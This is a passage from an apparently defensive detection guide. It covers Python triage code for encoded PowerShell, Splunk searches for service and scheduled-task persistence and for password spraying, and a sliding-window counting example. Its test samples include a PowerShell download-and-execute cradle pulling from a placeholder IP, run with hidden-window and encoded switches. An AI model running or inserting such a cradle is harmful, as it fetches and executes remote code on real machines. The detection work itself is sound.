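HIDDEN_RE = re.compile(r"(?:^|\s)[-/]w(indowstyle)?\s+hidden\b", re.IGNORECASE)
PS_RE = re.compile(r"(?:^|\\)(powershell|pwsh|powershell_ise)(\.exe)?(?=\s|$)", re.IGNORECASE)


def encode_command(script: str) -> str:
    """What the attacker does: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_command(cmdline: str) -> Optional[Tuple[str, Optional[str]]]:
    """Return (switch_as_typed, decoded_script), or None if no -EncodedCommand is present.
    decoded_script is None when the blob is not valid Base64 / UTF-16LE."""
    for m in SWITCH_RE.finditer(cmdline):
        switch, blob = m.group(1), m.group(2)
        if not "encodedcommand".startswith(switch.lower()):
            continue  # -ExecutionPolicy, -Encoding, ...
        try:
            return switch, base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return switch, None
    return None


def triage(cmdline: str) -> dict:
    """Flags mirroring the SPL: alert on an encoded command, or on -nop together with a hidden window."""
    enc = extract_encoded_command(cmdline)
    flags = {
        "powershell": bool(PS_RE.search(cmdline)),
        "encoded": enc is not None,
        "noprofile": bool(NOPROFILE_RE.search(cmdline)),
        "hidden": bool(HIDDEN_RE.search(cmdline)),
        "decoded": enc[1] if enc else None,
    }
    flags["alert"] = flags["powershell"] and (flags["encoded"] or (flags["noprofile"] and flags["hidden"]))
    return flags


# Constructed command lines
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
SAMPLES = [
    f"powershell.exe -nop -w hidden -enc {encode_command(PAYLOAD)}",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe -e AAAA",  # valid Base64, but three bytes is not UTF-16LE
    r"C:\Windows\System32\cmd.exe /c echo hello",
]

if __name__ == "__main__":
    for line in SAMPLES:
        t = triage(line)
        print(t["alert"], t["encoded"], t["noprofile"], t["hidden"], repr(t["decoded"]))
```

An encoded blob that fails to decode is still reported as encoded: attackers sometimes pass odd-length or deliberately broken Base64 to trip naive decoders, and the presence of the switch is the signal, not the decodability.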

Creation of unusual services or scheduled tasks

Among the most common persistence mechanisms, and also the footprint of PsExec-style lateral movement: Metasploit's psexec modules install a randomly named service whose binary path is either a dropped executable in ADMIN$ or a %COMSPEC% /c ... powershell one-liner. A new service (System log Event 7045) outside patch windows, or a scheduled task (4698) that runs an unsigned binary, a script interpreter or PowerShell, is high-priority.

Detect (SPL)
7045 + scheduled-task creation
# New service installations (System log). Field names are ServiceName/ImagePath/StartType in XmlWinEventLog
# and Service_Name/Service_File_Name/Service_Start_Type in the classic extraction
index=wineventlog EventCode=7045
| eval svc=coalesce(ServiceName, Service_Name), svc_path=coalesce(ImagePath, Service_File_Name),
       start=coalesce(StartType, Service_Start_Type)
| eval suspicious=if(match(svc_path, "(?i)%COMSPEC%|cmd\.exe|powershell|ADMIN\$|Temp|Users"), 1, 0)
| table _time, ComputerName, svc, svc_path, start, suspicious

# Scheduled task creation (4698; needs "Audit Other Object Access Events"); the task XML sits in the message body
index=wineventlog EventCode=4698
| rex field=Message "<Command>(?<cmd>[^<]+)</Command>"
| rex field=Message "<Arguments>(?<args>[^<]+)</Arguments>"
| table _time, ComputerName, Account_Name, Task_Name, cmd, args

Abnormal volume of authentications · brute-force / spray

Spray attacks are slow per account but loud in aggregate: many failed logons across different accounts from one source (low-and-slow), or many failures for one account in a short window (classic brute force). 4625 is only logged on the host that was targeted; sprays against domain accounts via Kerberos show up on the DCs as 4771 (pre-authentication failed, failure code 0x18) and via NTLM as 4776 (error 0xC000006A), so run the same aggregation over those. Fixed 5-minute buckets can split an attack across two buckets and halve the count; a sliding window (streamstats time_window) does not.

Detect (SPL)
Auth volume · spray detection
# Password spray: many DIFFERENT users failing from one source (4625 on members, 4771/4776 on DCs)
index=wineventlog earliest=-30m
  (EventCode=4625 OR (EventCode=4771 Failure_Code="0x18") OR (EventCode=4776 Error_Code="0xC000006A"))
| eval src=coalesce(src_ip, Client_Address, Source_Workstation)
| stats dc(Account_Name) as users, values(EventCode) as codes, count by src
| where users > 10

# Brute-force: many fails for one user in any sliding 5-minute window
index=wineventlog EventCode=4625
| sort 0 Account_Name, src_ip, _time
| streamstats time_window=5m count as fails by Account_Name, src_ip
| where fails > 15
| stats max(fails) as peak_fails, min(_time) as first, max(_time) as last by Account_Name, src_ip
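The counting behind this section, the SSH fan-out rule under Ansible / Automation and the admin-port fan-out under Network is the same operation: distinct values per source inside a time window. Here it is as an added example written for this page (not code from the original page), with a sliding window next to SPL-style fixed buckets so the bucket-boundary problem is visible. The events are constructed: a brute force that straddles a 5-minute bucket edge, a spray over 12 accounts, and an SSH fan-out from an unknown host alongside the (allowlisted) Ansible controller.

```python
"""Sliding-window aggregation behind the fan-out and spray / brute-force searches.

Added example for this page, not code from the original. Events are constructed. It
shows the bucket-boundary problem: the brute force below puts 10 failures in each of
two adjacent 5-minute buckets, so `bucket _time span=5m` never reaches 15, while a
sliding 5-minute window counts all 20. The same helper serves SSH fan-out (distinct
target hosts per source) and password spraying (distinct accounts per source)."""
from collections import defaultdict
from typing import Callable, Dict, Hashable, Iterable, Tuple


def sliding_window_peak(events: Iterable[Tuple[float, dict]], window: float,
                        key_fn: Callable[[dict], Hashable],
                        value_fn: Callable[[dict], Hashable]) -> Dict[Hashable, int]:
    """For each key, the largest number of distinct values inside any span of `window` seconds."""
    per_key = defaultdict(list)
    for ts, rec in events:
        per_key[key_fn(rec)].append((ts, value_fn(rec)))
    peaks: Dict[Hashable, int] = {}
    for key, items in per_key.items():
        items.sort()
        in_window: Dict[Hashable, int] = defaultdict(int)  # value -> occurrences in window
        left, best = 0, 0
        for ts, val in items:
            in_window[val] += 1
            while ts - items[left][0] > window:          # slide the left edge forward
                old = items[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            best = max(best, len(in_window))
        peaks[key] = best
    return peaks


def fixed_bucket_peak(events, window, key_fn, value_fn) -> Dict[Hashable, int]:
    """The same measurement with fixed buckets, i.e. what `bucket _time span=<window>` gives."""
    buckets: Dict[Tuple[Hashable, int], set] = defaultdict(set)
    for ts, rec in events:
        buckets[(key_fn(rec), int(ts // window))].add(value_fn(rec))
    peaks: Dict[Hashable, int] = {}
    for (key, _), vals in buckets.items():
        peaks[key] = max(peaks.get(key, 0), len(vals))
    return peaks


def constructed_events():
    """Constructed auth events: 4625 failures and sshd 'Accepted' logins. base is a multiple of 300."""
    base = 1_699_999_800
    ev, n = [], 0

    def add(ts, **rec):
        nonlocal n
        n += 1
        ev.append((ts, dict(rec, id=n)))

    # Brute force: 10 failures just before and 10 just after a 5-minute bucket edge (base+300)
    for i in range(10):
        add(base + 240 + 6 * i, kind="4625", src="10.1.2.50", user="svc_backup")
        add(base + 306 + 6 * i, kind="4625", src="10.1.2.50", user="svc_backup")
    # Spray: one failure each for 12 accounts from one source within two minutes
    for i in range(12):
        add(base + 10 * i, kind="4625", src="10.1.2.60", user=f"user{i:02d}")
    # SSH fan-out: an unknown host reaches 7 servers; the Ansible controller reaches 30
    for i in range(7):
        add(base + 20 * i, kind="ssh_accepted", src="10.1.2.70", dest=f"web{i:02d}")
    for i in range(30):
        add(base + 5 * i, kind="ssh_accepted", src="10.1.2.5", dest=f"node{i:02d}")
    return ev


def detect(events, ansible_ctrl="10.1.2.5"):
    """Apply the page's thresholds: >15 fails per user/source, >10 users per source, >5 SSH targets."""
    fails = [(ts, r) for ts, r in events if r["kind"] == "4625"]
    ssh = [(ts, r) for ts, r in events if r["kind"] == "ssh_accepted"]
    brute_sliding = sliding_window_peak(fails, 300, lambda r: (r["user"], r["src"]), lambda r: r["id"])
    brute_bucketed = fixed_bucket_peak(fails, 300, lambda r: (r["user"], r["src"]), lambda r: r["id"])
    spray = sliding_window_peak(fails, 1800, lambda r: r["src"], lambda r: r["user"])
    fanout = sliding_window_peak(ssh, 900, lambda r: r["src"], lambda r: r["dest"])
    return {
        "brute_force": {k: v for k, v in brute_sliding.items() if v > 15},
        "brute_force_bucketed": {k: v for k, v in brute_bucketed.items() if v > 15},
        "spray": {k: v for k, v in spray.items() if v > 10},
        "ssh_fanout": {k: v for k, v in fanout.items() if v > 5 and k != ansible_ctrl},
    }


if __name__ == "__main__":
    for name, hits in detect(constructed_events()).items():
        print(name, hits)
```

For the brute-force case the value is the event id, so "distinct values" degenerates to a plain count; for spray and fan-out it is the account or target host. The bucketed result comes back empty for the same 20 failures, which is exactly what the SPL tip about streamstats time_window is guarding against.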